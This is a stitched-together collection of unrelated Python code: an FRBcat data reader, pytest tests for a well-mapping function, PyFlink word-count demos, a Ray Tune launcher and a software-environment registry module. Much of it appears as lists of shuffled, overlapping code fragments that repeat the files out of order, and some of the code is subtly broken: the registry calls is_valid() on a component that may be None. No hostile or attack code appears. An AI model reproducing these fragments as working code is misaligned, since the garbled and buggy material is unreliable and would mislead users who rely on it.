"the first item in the `iterable` that satisfies the `condition`. If the condition",
"is also undesirable. sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd = None",
"return res return MeasureTime() from time import sleep ## wrapper to write hdf5",
"# without a delay is also undesirable. sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN)",
"not given, returns the first item of the iterable. Returns -1 if no",
"file(s) ## file is locked when with starts until its left ## if",
")[0][0] i_zs = np.where( header == 'rmp_redshift_host' )[0][0] i_tele = np.where( header ==",
")[0][0] i_RM = np.where( header == 'rmp_rm' )[0][0] i_tau = np.where( header ==",
"fit order of FRB_dtype for row in reader: if telescopes and ( row[i_tele]",
"np.where( header == 'telescope' )[0][0] i_s = [i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs,",
"if no item satysfing the condition is found. >>> first( (1,2,3), condition=lambda x:",
"consistently def Write2h5( filename='', datas=[], keys=[] ): \"\"\" conveniently write datas to keys",
"telescopes, FRBs of other telescopes are ignored RM : boolean if True, only",
"header = np.array(next(reader)) # header = np.array(reader.next()) i_ID = 0 i_DM = np.where(",
"== 'null' ) : continue FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for i, dtype",
"as necessary.\"\"\" def __init__(self, path, timeout = None): self._path = path self._timeout =",
"\"\"\" measure time taken to compute function \"\"\" def MeasureTime(): t0 = time()",
"in your h5 file. in that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0",
"= np.where( header == 'rop_mw_dm_limit' )[0][0] i_RM = np.where( header == 'rmp_rm' )[0][0]",
">>> first(range(3, 100)) 3 >>> first( (1,2,3), condition=lambda x: x > 9) -1",
"np.where( header == 'rmp_dm' )[0][0] i_DM_gal = np.where( header == 'rop_mw_dm_limit' )[0][0] i_RM",
"in zip( i_s, np.array(FRB_dtype)[:,1] ) ] ) ) return np.array( FRBs, dtype=FRB_dtype )",
"FRBcat \"\"\" ### read all FRBs from FRBcat ### optional: read only those",
"None): self._path = path self._timeout = timeout self._fd = None def __enter__(self): self._fd",
"header == 'rmp_rm' )[0][0] i_tau = np.where( header == 'rmp_scattering' )[0][0] i_zs =",
"FRBs Returns ------- FRBs : array structured numpy.array containing values listed in FRBcat",
"): \"\"\" returns measures of FRBs in FRBcat read with GetFRBcat() \"\"\" if",
"\"timeout exceeded\" ) raise # TODO It would be nice to avoid an",
"datas, keys ): try: f[key][()] f.__delitem__( key ) except: pass f.create_dataset( key, data=data",
"short wrapper to decode byte-strings read from FRBcat \"\"\" if 'f' in dtype:",
"#FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'),",
"% 2 == 0) 2 >>> first(range(3, 100)) 3 >>> first( (1,2,3), condition=lambda",
"os.open(self._path, os.O_CREAT) start_lock_search = time() while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) #",
"\"Running %s took %i minutes and %.1f seconds %s\" % (f.__name__, t//60, t%60,",
"FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype =",
"whether a lock # exists by examining the filesystem. try: os.unlink(self._path) except: pass",
"boolean if True, print number of extractet FRBs Returns ------- FRBs : array",
"h5.File( filename, 'a' ) as f: for data, key in zip( datas, keys",
"for tele in telescopes] ) : continue if tau and ( row[i_tau] ==",
"\"\"\" wrapper to print the time needed to call function f \"\"\" t0",
"RM and tau ### print_number:True print number of extracted FRBs FRBs = []",
"= np.array(reader.next()) i_ID = 0 i_DM = np.where( header == 'rmp_dm' )[0][0] i_DM_gal",
"\"\"\" if 'f' in dtype: if 'null' in string: return float('NaN') return float(string)",
"try: f[key][()] f.__delitem__( key ) except: pass f.create_dataset( key, data=data ) break #except:"
] |
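Tying the helpers together, a short driver might look like the sketch below; the file names and the combined use of `Lock` and `Write2h5` are illustrative assumptions, not part of the original module:

## hypothetical driver: read FRBs with measured RM, then store their measures under a lock
FRBs = GetFRBcat( RM=True, print_number=True )
with Lock( 'frbcat_measures.h5.lock', timeout=10 ):
    Write2h5( filename='frbcat_measures.h5',
              datas=[ FRBs['DM'], FRBs['RM'] ],
              keys=[ 'FRBcat/DM', 'FRBcat/RM' ] )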
<reponame>GallowayLabMIT/rushd
import pytest
from rushd.well_mapper import well_mapping


def test_default_separator():
    """
    Tests that the default separator is a period,
    and that conditions are properly merged together.
    """
    result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}])
    print(result)
    assert result['A01'] == 'foo.bar'


def test_custom_separator():
    """
    Tests that we can override the mapping separator.
    """
    for sep in r'!@#$%^&*()<>,\/':
        result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}], separator=sep)
        assert result['A01'] == f'foo{sep}bar'


def test_valid_mapping_spec():
    """
    Tests valid specifications do not throw an error
    """
    _ = well_mapping(
        {
            'a': 'A01',
            'b': 'A1',
            'c': 'A2,',  # allow trailing commas
            'd': 'A1-B12',
            'e': 'A1-B12,C5,C4-F8',
            'f': 'A1-B12, C12, D4',  # allow whitespace
        }
    )
    assert True


def test_invalid_mapping_spec():
    """
    Tests that invalid specifications throw errors
    """
    with pytest.raises(ValueError):
        _ = well_mapping({'a': ''})
    with pytest.raises(ValueError):
        _ = well_mapping({'a': 'Z99'})
    with pytest.raises(ValueError):
        _ = well_mapping({'a': 'A1:A15'})


def test_backwards_rectangles():
    """
    Tests that arbitrary rectangles are allowed
    (even those that are not upper-left corner to bottom-right)
    """
    result = well_mapping([{'foo': 'F8-C4'}])
    for key in ['C4', 'C8', 'F4', 'F8', 'D6']:
        assert result[key] == 'foo'


def test_normed_and_unnormed_single_well():
    """
    Tests that normalized and un-normalized well-IDs are handled
    for looking up a single well entry.
    """
    result = well_mapping([{'foo': 'A1'}, {'bar': 'A10'}, {'baz': 'A1,A10'}])
    assert result['A1'] == 'foo.baz'
    assert result['A01'] == 'foo.baz'
    assert result['A10'] == 'bar.baz'


def test_normed_and_unnormed_rectangle():
    """
    Tests that normalized and un-normalized well-IDs are handled
    for looking up a rectangular mapping entry.
    """
    result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1-A10'}])
    assert result['A1'] == 'foo.baz'
    assert result['A01'] == 'foo.baz'
    assert result['A10'] == 'bar.baz'


def test_normed_and_unnormed_mix():
    """
    Tests that normalized and un-normalized well-IDs are handled
    for looking up a mix of mapping entries.
    """
    result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1,A10'}])
    assert result['A1'] == 'foo.baz'
    assert result['A01'] == 'foo.baz'
    assert result['A10'] == 'bar.baz'


def test_normed_unnormed_input():
    """
    Tests that normalized and unnormalized input well mappings work.
    """
    result = well_mapping(
        [{'foo': 'A1-G9'}, {'bar': 'A01-G09'}, {'baz': 'A1-G09'}, {'qaz': 'A01-G9'}]
    )
    for i in range(1, 10):
        assert result[f'A{i}'] == 'foo.bar.baz.qaz'
        assert result[f'A{i:02d}'] == 'foo.bar.baz.qaz'
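Since the tests above index the result like a dictionary, the mapping drops naturally onto tabular data; a small illustrative sketch (the pandas usage and condition names are assumptions here, not part of the test suite):

import pandas as pd
from rushd.well_mapper import well_mapping

# label per-well measurements with their experimental condition
mapping = well_mapping([{'dox': 'A1-D12'}, {'untreated': 'E1-H12'}])
df = pd.DataFrame({'well': ['A01', 'E07'], 'signal': [1523.0, 201.5]})
df['condition'] = df['well'].map(lambda w: mapping[w])
print(df)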
import logging
import os
import shutil
import sys
import tempfile

from pyflink.dataset import ExecutionEnvironment
from pyflink.table import BatchTableEnvironment, TableConfig, DataTypes
from pyflink.table import expressions as expr
from pyflink.table.descriptors import OldCsv, FileSystem, Schema
from pyflink.table.expressions import lit


def demo01():
    exec_env = ExecutionEnvironment.get_execution_environment()
    exec_env.set_parallelism(1)
    t_config = TableConfig()
    t_env = BatchTableEnvironment.create(exec_env, t_config)  # StreamExecutionEnvironment

    t_env.connect(FileSystem().path(r'F:\github\openjw\penter\bigdata_study\pyflink1.x\batch\demo01\input')) \
        .with_format(OldCsv()
                     .field('word', DataTypes.STRING())) \
        .with_schema(Schema()
                     .field('word', DataTypes.STRING())) \
        .create_temporary_table('mySource')

    # raises an error if the output file already exists
    t_env.connect(FileSystem().path(r'F:\github\openjw\penter\bigdata_study\pyflink1.x\batch\demo01\output')) \
        .with_format(OldCsv()
                     .field_delimiter('\t')
                     .field('word', DataTypes.STRING())
                     .field('count', DataTypes.BIGINT())) \
        .with_schema(Schema()
                     .field('word', DataTypes.STRING())
                     .field('count', DataTypes.BIGINT())) \
        .create_temporary_table('mySink')

    tab = t_env.from_path('mySource')
    tab.group_by(tab.word) \
        .select(tab.word, lit(1).count) \
        .execute_insert('mySink').wait()


def demo02():
    exec_env = ExecutionEnvironment.get_execution_environment()
    exec_env.set_parallelism(1)
    t_config = TableConfig()
    t_env = BatchTableEnvironment.create(exec_env, t_config)  # StreamExecutionEnvironment

    my_source_ddl = """
    create table mySource (
        word VARCHAR
    ) with (
        'connector' = 'filesystem',
        'format.type' = 'csv',
        'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input'
    )
    """
    my_sink_ddl = """
    create table mySink (
        word VARCHAR,
        `count` BIGINT
    ) with (
        'connector' = 'filesystem',
        'format.type' = 'csv',
        'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/output'
    )
    """
    t_env.execute_sql(my_source_ddl)
    t_env.execute_sql(my_sink_ddl)

    tab = t_env.from_path('mySource')
    tab.group_by(tab.word) \
        .select(tab.word, lit(1).count) \
        .execute_insert('mySink').wait()


if __name__ == '__main__':
    # demo01()
    demo02()  # does not run as-is; see the note below
"BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment my_source_ddl = \"\"\" create table mySource ( word VARCHAR",
") \"\"\" my_sink_ddl = \"\"\" create table mySink ( word VARCHAR, `count` BIGINT",
"expr from pyflink.table.descriptors import OldCsv, FileSystem, Schema from pyflink.table.expressions import lit def demo01():",
"'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input' ) \"\"\" my_sink_ddl = \"\"\" create table",
"\\ .with_format(OldCsv() .field_delimiter('\\t') .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .with_schema(Schema() .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT()))",
"\"\"\" my_sink_ddl = \"\"\" create table mySink ( word VARCHAR, `count` BIGINT )",
"lit def demo01(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env,",
"t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() def demo02(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1)",
"t_env.execute_sql(my_source_ddl) t_env.execute_sql(my_sink_ddl) tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() if __name__",
"'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/output' ) \"\"\" t_env.execute_sql(my_source_ddl) t_env.execute_sql(my_sink_ddl) tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\",
"Schema from pyflink.table.expressions import lit def demo01(): exec_env = ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config =",
".field('count', DataTypes.BIGINT())) \\ .with_schema(Schema() .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .create_temporary_table('mySink') tab = t_env.from_path('mySource')",
"exec_env.set_parallelism(1) t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\input')) \\ .with_format(OldCsv()",
") with ( 'connector' = 'filesystem', 'format.type' = 'csv', 'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input' )",
"t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment my_source_ddl = \"\"\" create table mySource (",
"文件存在会报错 t_env.connect(FileSystem().path(r'F:\\github\\openjw\\penter\\bigdata_study\\pyflink1.x\\batch\\demo01\\output')) \\ .with_format(OldCsv() .field_delimiter('\\t') .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .with_schema(Schema() .field('word', DataTypes.STRING())",
"import os import shutil import sys import tempfile from pyflink.dataset import ExecutionEnvironment from",
"= ExecutionEnvironment.get_execution_environment() exec_env.set_parallelism(1) t_config = TableConfig() t_env = BatchTableEnvironment.create(exec_env, t_config) # StreamExecutionEnvironment my_source_ddl",
"DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .with_schema(Schema() .field('word', DataTypes.STRING()) .field('count', DataTypes.BIGINT())) \\ .create_temporary_table('mySink') tab =",
"word VARCHAR ) with ( 'connector' = 'filesystem', 'format.type' = 'csv', 'connector.path' =",
"tab = t_env.from_path('mySource') tab.group_by(tab.word) \\ .select(tab.word, lit(1).count) \\ .execute_insert('mySink').wait() def demo02(): exec_env ="
] |
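Both demos implement the same batch word count; demo01 declares the source and sink through the deprecated descriptor API (OldCsv/Schema), while demo02 declares them via SQL DDL. If demo02 indeed fails, as the launcher comment says, a plausible cause is that the DDL mixes the legacy 'format.type'/'connector.path' keys with the newer 'connector' = 'filesystem' factory, which expects 'path' and 'format' instead. A minimal sketch of seeding the input directory before running the job; the local path below is an assumption standing in for the hard-coded F:/ paths:

# Minimal sketch, assuming a local stand-in for the demo's input directory.
from pathlib import Path

input_dir = Path("/tmp/pyflink_demo/input")  # assumption: substitute your own path
input_dir.mkdir(parents=True, exist_ok=True)
# One word per line; the CSV format maps each line to the single 'word' column.
(input_dir / "words.csv").write_text("flink\nword\ncount\nword\n")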
import git
import ray
from ray import tune
from ray.tune import CLIReporter

from agent0.common.utils import parse_arguments
from agent0.nips_encoder.trainer import Trainer, Config

if __name__ == '__main__':
    repo = git.Repo(search_parent_directories=True)
    sha = repo.git.rev_parse(repo.head.object.hexsha, short=True)
    sha_long = repo.head.object.hexsha

    cfg = Config(sha=sha_long)
    args = parse_arguments(cfg)
    cfg = Config(**vars(args))

    ray.init(memory=20 * 2 ** 30, object_store_memory=80 * 2 ** 30)

    reporter = CLIReporter(
        metric_columns=["game", "speed", "loss", "adam_lr", "time_remain", "time_past"]
    )

    analysis = tune.run(
        Trainer,
        name='nips_encoder_tune',
        verbose=1,
        stop=lambda trial_id, result: result['epoch'] > cfg.epochs,
        checkpoint_at_end=True,
        progress_reporter=reporter,
        checkpoint_freq=cfg.replay_size // cfg.batch_size,
        resources_per_trial={"gpu": 1},
        config=vars(cfg),
        fail_fast=True,
        reuse_actors=True,
        restore=cfg.restore_checkpoint,
    )
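tune.run treats Trainer as a class-based Trainable: Tune constructs one instance per trial with config=vars(cfg), calls its training step repeatedly, and stops a trial once the reported result['epoch'] exceeds cfg.epochs. The agent0 Trainer itself is not reproduced here; the following is a minimal, hypothetical sketch of the contract such a class must satisfy (method names follow the class-based Trainable API of recent Ray releases, which may differ from the Ray version this script targets):

# Hypothetical stand-in for agent0's Trainer, showing the Trainable contract.
from ray import tune

class ToyTrainer(tune.Trainable):
    def setup(self, config):
        # config receives vars(cfg) from the launcher above.
        self.epoch = 0

    def step(self):
        # One logical training iteration per call; the returned keys drive the
        # CLIReporter columns and the stop=... predicate (which reads 'epoch').
        self.epoch += 1
        return {"epoch": self.epoch, "loss": 1.0 / self.epoch}

Since tune.run returns an analysis object, the best configuration can be pulled out afterwards, e.g. analysis.get_best_config(metric="loss", mode="min").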
from __future__ import annotations

import typing as t
from dataclasses import dataclass
from pathlib import Path

from loguru import logger
from rich.console import Console
from rich.console import ConsoleOptions
from rich.console import Group
from rich.console import group
from rich.console import RenderResult
from rich.markdown import Markdown
from rich.panel import Panel
from rich.table import Table
from rich.tree import Tree

from dagos.core.components import SoftwareComponent


class SoftwareEnvironmentRegistry(type):
    """A metaclass responsible for registering software environments."""

    environments: t.List[SoftwareEnvironment] = []

    def __call__(cls, *args: t.Any, **kwds: t.Any) -> t.Any:
        """The registry hooks into the object construction lifecycle to register
        software environments.
        """
        environment = super().__call__(*args, **kwds)
        if cls not in cls.environments:
            cls.environments.append(environment)
        return environment

    @classmethod
    def find_environment(cls, name: str) -> t.Optional[SoftwareEnvironment]:
        for environment in cls.environments:
            if environment.name == name:
                return environment
        return None


@dataclass
class Platform:
    env: t.List[EnvironmentVariable]
    packages: t.List[Packages]
    images: t.List[Image]

    def __rich_console__(
        self, console: Console, options: ConsoleOptions
    ) -> t.Generator[RenderResult]:
        parent_table = Table(box=None)
        parent_table.add_column()
        parent_table.add_column()

        common_package_table = Table(title="Common Packages", show_header=False)
        common_package_table.add_column("")
        common_package_tree = Tree("packages")
        for packages in self.packages:
            common_package_tree.add(packages.__rich__())
        common_package_table.add_row(common_package_tree)

        image_table = Table(title=f"Targeted Container Images ({len(self.images)})")
        image_table.add_column("ID")
        image_table.add_column("Packages")
        for image in self.images:
            package_tree = Tree("packages")
            for packages in image.packages:
                package_tree.add(packages.__rich__())
            image_table.add_row(image.id, package_tree)

        parent_table.add_row(common_package_table, image_table)
        yield parent_table


@dataclass
class EnvironmentVariable:
    name: str
    value: str


@dataclass
class Packages:
    package_list: t.List[str]
    manager: str = "system"
    dependency: t.Optional[str] = None

    def __rich__(self) -> Tree:
        title = (
            self.manager
            if self.dependency is None
            else f"{self.manager} ({self.dependency})"
        )
        tree = Tree(title)
        for package in self.package_list:
            tree.add(package)
        return tree


@dataclass
class Image:
    id: str
    packages: t.List[Packages]


@dataclass
class Component:
    name: str
    purpose: t.Optional[str]
    version: t.Optional[str]
    software_component: t.Optional[SoftwareComponent]


class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry):
    """Base class for software environments."""

    path: Path
    name: str
    description: t.Optional[str]
    platform: Platform
    components: t.List[Component]

    def __init__(
        self,
        path: Path,
        name: str,
        description: t.Optional[str],
        platform: Platform,
        components: t.List[Component],
    ) -> None:
        """"""
        self.path = path
        self.name = name
        self.description = description
        self.platform = platform
        self.components = components

    def collect_components(self) -> t.List[SoftwareComponent]:
        collected_components: t.List[SoftwareComponent] = []
        unknown_components: t.List[str] = []
        for component in self.components:
            if component.software_component:
                logger.trace("Requested component '{}' is known!", component.name)
                # TODO: Check if selected platform supports component?
                collected_components.append(component.software_component)
            else:
                unknown_components.append(component.name)
        if len(unknown_components) > 0:
            logger.error(
                "{} of the {} requested components are unknown, specifically: {}",
                len(unknown_components),
                len(self.components),
                ", ".join(unknown_components),
            )
        return collected_components

    def __rich__(self) -> Panel:
        @group()
        def get_renderables():
            yield Markdown(f"{self.description}\n")
            yield self.platform

            table = Table(
                title=f"Software Components ({len(self.components)})",
                title_justify="left",
                show_lines=True,
                expand=True,
            )
            table.add_column("Name")
            table.add_column("Purpose", ratio=1)
            table.add_column("Version", justify="right")
            table.add_column("Found?", justify="center")
            table.add_column("Valid?", justify="center")
            for component in self.components:
                table.add_row(
                    component.name,
                    component.purpose,
                    component.version,
                    ":white_check_mark:" if component.software_component else ":cross_mark:",
                    ":white_check_mark:" if component.software_component.is_valid() else ":cross_mark:",
                )
            yield table

        return Panel(
            Group(get_renderables()),
            title=f"Environment: {self.name}",
            title_align="left",
            subtitle=f"Path: {self.path}",
            subtitle_align="right",
        )
"loguru import logger from rich.console import Console from rich.console import ConsoleOptions from rich.console",
"f\"{self.manager} ({self.dependency})\" ) tree = Tree(title) for package in self.package_list: tree.add(package) return tree",
"[] def __call__(cls, *args: t.Any, **kwds: t.Any) -> t.Any: \"\"\"The registry hooks into",
"rich.console import Group from rich.console import group from rich.console import RenderResult from rich.markdown",
"the {} requested components are unknown, specifically: {}\", len(unknown_components), len(self.components), \", \".join(unknown_components), )",
"for packages in self.packages: common_package_tree.add(packages.__rich__()) common_package_table.add_row(common_package_tree) image_table = Table(title=f\"Targeted Container Images ({len(self.images)})\") image_table.add_column(\"ID\")",
"t.List[str] manager: str = \"system\" dependency: t.Optional[str] = None def __rich__(self) -> Tree:",
"package in self.package_list: tree.add(package) return tree @dataclass class Image: id: str packages: t.List[Packages]",
"name: str description: t.Optional[str] platform: Platform components: t.List[Component] def __init__( self, path: Path,",
"else: unknown_components.append(component.name) if len(unknown_components) > 0: logger.error( \"{} of the {} requested components",
"software_component: t.Optional[SoftwareComponent] class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry): \"\"\"Base class for software environments.\"\"\" path: Path name: str",
"import SoftwareComponent class SoftwareEnvironmentRegistry(type): \"\"\"A metaclass responsible for registering software environments.\"\"\" environments: t.List[SoftwareEnvironment]",
"dataclass from pathlib import Path from loguru import logger from rich.console import Console",
"for component in self.components: table.add_row( component.name, component.purpose, component.version, \":white_check_mark:\" if component.software_component else \":cross_mark:\",",
"responsible for registering software environments.\"\"\" environments: t.List[SoftwareEnvironment] = [] def __call__(cls, *args: t.Any,",
"Tree(\"packages\") for packages in image.packages: package_tree.add(packages.__rich__()) image_table.add_row(image.id, package_tree) parent_table.add_row(common_package_table, image_table) yield parent_table @dataclass",
"Platform components: t.List[Component] def __init__( self, path: Path, name: str, description: t.Optional[str], platform:",
"str packages: t.List[Packages] @dataclass class Component: name: str purpose: t.Optional[str] version: t.Optional[str] software_component:",
"common_package_table = Table(title=\"Common Packages\", show_header=False) common_package_table.add_column(\"\") common_package_tree = Tree(\"packages\") for packages in self.packages:",
"Markdown(f\"{self.description}\\n\") yield self.platform table = Table( title=f\"Software Components ({len(self.components)})\", title_justify=\"left\", show_lines=True, expand=True, )",
"collected_components: t.List[SoftwareComponent] = [] unknown_components: t.List[str] = [] for component in self.components: if",
"-> t.Generator[RenderResult]: parent_table = Table(box=None) parent_table.add_column() parent_table.add_column() common_package_table = Table(title=\"Common Packages\", show_header=False) common_package_table.add_column(\"\")",
"get_renderables(): yield Markdown(f\"{self.description}\\n\") yield self.platform table = Table( title=f\"Software Components ({len(self.components)})\", title_justify=\"left\", show_lines=True,",
"image_table.add_column(\"Packages\") for image in self.images: package_tree = Tree(\"packages\") for packages in image.packages: package_tree.add(packages.__rich__())",
"str @dataclass class Packages: package_list: t.List[str] manager: str = \"system\" dependency: t.Optional[str] =",
"in self.package_list: tree.add(package) return tree @dataclass class Image: id: str packages: t.List[Packages] @dataclass",
"Platform: env: t.List[EnvironmentVariable] packages: t.List[Packages] images: t.List[Image] def __rich_console__( self, console: Console, options:",
"class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry): \"\"\"Base class for software environments.\"\"\" path: Path name: str description: t.Optional[str]",
"register software environments. \"\"\" environment = super().__call__(*args, **kwds) if cls not in cls.environments:",
"= path self.name = name self.description = description self.platform = platform self.components =",
"Console, options: ConsoleOptions ) -> t.Generator[RenderResult]: parent_table = Table(box=None) parent_table.add_column() parent_table.add_column() common_package_table =",
"{}\", len(unknown_components), len(self.components), \", \".join(unknown_components), ) return collected_components def __rich__(self) -> Panel: @group()",
"t.Optional[str] software_component: t.Optional[SoftwareComponent] class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry): \"\"\"Base class for software environments.\"\"\" path: Path name:",
"components: t.List[Component] def __init__( self, path: Path, name: str, description: t.Optional[str], platform: Platform,",
") yield table return Panel( Group(get_renderables()), title=f\"Environment: {self.name}\", title_align=\"left\", subtitle=f\"Path: {self.path}\", subtitle_align=\"right\", )",
"t.Optional[str] = None def __rich__(self) -> Tree: title = ( self.manager if self.dependency",
"-> Tree: title = ( self.manager if self.dependency is None else f\"{self.manager} ({self.dependency})\"",
"t.List[Packages] images: t.List[Image] def __rich_console__( self, console: Console, options: ConsoleOptions ) -> t.Generator[RenderResult]:",
"import ConsoleOptions from rich.console import Group from rich.console import group from rich.console import",
"for packages in image.packages: package_tree.add(packages.__rich__()) image_table.add_row(image.id, package_tree) parent_table.add_row(common_package_table, image_table) yield parent_table @dataclass class",
"from rich.console import RenderResult from rich.markdown import Markdown from rich.panel import Panel from",
"def collect_components(self) -> t.List[SoftwareComponent]: collected_components: t.List[SoftwareComponent] = [] unknown_components: t.List[str] = [] for",
"\":white_check_mark:\" if component.software_component else \":cross_mark:\", \":white_check_mark:\" if component.software_component.is_valid() else \":cross_mark:\", ) yield table",
"def __init__( self, path: Path, name: str, description: t.Optional[str], platform: Platform, components: t.List[Component],",
"unknown_components: t.List[str] = [] for component in self.components: if component.software_component: logger.trace(\"Requested component '{}'",
"from dagos.core.components import SoftwareComponent class SoftwareEnvironmentRegistry(type): \"\"\"A metaclass responsible for registering software environments.\"\"\"",
"-> t.Optional[SoftwareEnvironment]: for environment in cls.environments: if environment.name == name: return environment return",
") -> t.Generator[RenderResult]: parent_table = Table(box=None) parent_table.add_column() parent_table.add_column() common_package_table = Table(title=\"Common Packages\", show_header=False)",
"else \":cross_mark:\", \":white_check_mark:\" if component.software_component.is_valid() else \":cross_mark:\", ) yield table return Panel( Group(get_renderables()),",
"__rich__(self) -> Tree: title = ( self.manager if self.dependency is None else f\"{self.manager}",
"__rich_console__( self, console: Console, options: ConsoleOptions ) -> t.Generator[RenderResult]: parent_table = Table(box=None) parent_table.add_column()",
"import logger from rich.console import Console from rich.console import ConsoleOptions from rich.console import",
"image_table = Table(title=f\"Targeted Container Images ({len(self.images)})\") image_table.add_column(\"ID\") image_table.add_column(\"Packages\") for image in self.images: package_tree",
"self.components: if component.software_component: logger.trace(\"Requested component '{}' is known!\", component.name) # TODO: Check if",
"for software environments.\"\"\" path: Path name: str description: t.Optional[str] platform: Platform components: t.List[Component]",
"annotations import typing as t from dataclasses import dataclass from pathlib import Path",
"dagos.core.components import SoftwareComponent class SoftwareEnvironmentRegistry(type): \"\"\"A metaclass responsible for registering software environments.\"\"\" environments:",
"= super().__call__(*args, **kwds) if cls not in cls.environments: cls.environments.append(environment) return environment @classmethod def",
"component '{}' is known!\", component.name) # TODO: Check if selected platform supports component?",
"rich.table import Table from rich.tree import Tree from dagos.core.components import SoftwareComponent class SoftwareEnvironmentRegistry(type):",
"super().__call__(*args, **kwds) if cls not in cls.environments: cls.environments.append(environment) return environment @classmethod def find_environment(cls,",
"image in self.images: package_tree = Tree(\"packages\") for packages in image.packages: package_tree.add(packages.__rich__()) image_table.add_row(image.id, package_tree)",
"logger.trace(\"Requested component '{}' is known!\", component.name) # TODO: Check if selected platform supports",
"from rich.table import Table from rich.tree import Tree from dagos.core.components import SoftwareComponent class",
"ratio=1) table.add_column(\"Version\", justify=\"right\") table.add_column(\"Found?\", justify=\"center\") table.add_column(\"Valid?\", justify=\"center\") for component in self.components: table.add_row( component.name,",
"packages in self.packages: common_package_tree.add(packages.__rich__()) common_package_table.add_row(common_package_tree) image_table = Table(title=f\"Targeted Container Images ({len(self.images)})\") image_table.add_column(\"ID\") image_table.add_column(\"Packages\")",
"is known!\", component.name) # TODO: Check if selected platform supports component? collected_components.append(component.software_component) else:",
"from __future__ import annotations import typing as t from dataclasses import dataclass from",
"\"\"\" environment = super().__call__(*args, **kwds) if cls not in cls.environments: cls.environments.append(environment) return environment",
"@group() def get_renderables(): yield Markdown(f\"{self.description}\\n\") yield self.platform table = Table( title=f\"Software Components ({len(self.components)})\",",
"len(self.components), \", \".join(unknown_components), ) return collected_components def __rich__(self) -> Panel: @group() def get_renderables():",
"__rich__(self) -> Panel: @group() def get_renderables(): yield Markdown(f\"{self.description}\\n\") yield self.platform table = Table(",
"platform self.components = components def collect_components(self) -> t.List[SoftwareComponent]: collected_components: t.List[SoftwareComponent] = [] unknown_components:",
"def __rich__(self) -> Panel: @group() def get_renderables(): yield Markdown(f\"{self.description}\\n\") yield self.platform table =",
"\":cross_mark:\", \":white_check_mark:\" if component.software_component.is_valid() else \":cross_mark:\", ) yield table return Panel( Group(get_renderables()), title=f\"Environment:",
"registry hooks into the object construction lifecycle to register software environments. \"\"\" environment",
"justify=\"center\") table.add_column(\"Valid?\", justify=\"center\") for component in self.components: table.add_row( component.name, component.purpose, component.version, \":white_check_mark:\" if",
"Panel from rich.table import Table from rich.tree import Tree from dagos.core.components import SoftwareComponent",
"self, console: Console, options: ConsoleOptions ) -> t.Generator[RenderResult]: parent_table = Table(box=None) parent_table.add_column() parent_table.add_column()",
"find_environment(cls, name: str) -> t.Optional[SoftwareEnvironment]: for environment in cls.environments: if environment.name == name:",
") table.add_column(\"Name\") table.add_column(\"Purpose\", ratio=1) table.add_column(\"Version\", justify=\"right\") table.add_column(\"Found?\", justify=\"center\") table.add_column(\"Valid?\", justify=\"center\") for component in",
"= [] for component in self.components: if component.software_component: logger.trace(\"Requested component '{}' is known!\",",
"{} requested components are unknown, specifically: {}\", len(unknown_components), len(self.components), \", \".join(unknown_components), ) return",
"software environments.\"\"\" environments: t.List[SoftwareEnvironment] = [] def __call__(cls, *args: t.Any, **kwds: t.Any) ->",
"description: t.Optional[str], platform: Platform, components: t.List[Component], ) -> None: \"\"\"\"\"\" self.path = path",
"self.components = components def collect_components(self) -> t.List[SoftwareComponent]: collected_components: t.List[SoftwareComponent] = [] unknown_components: t.List[str]",
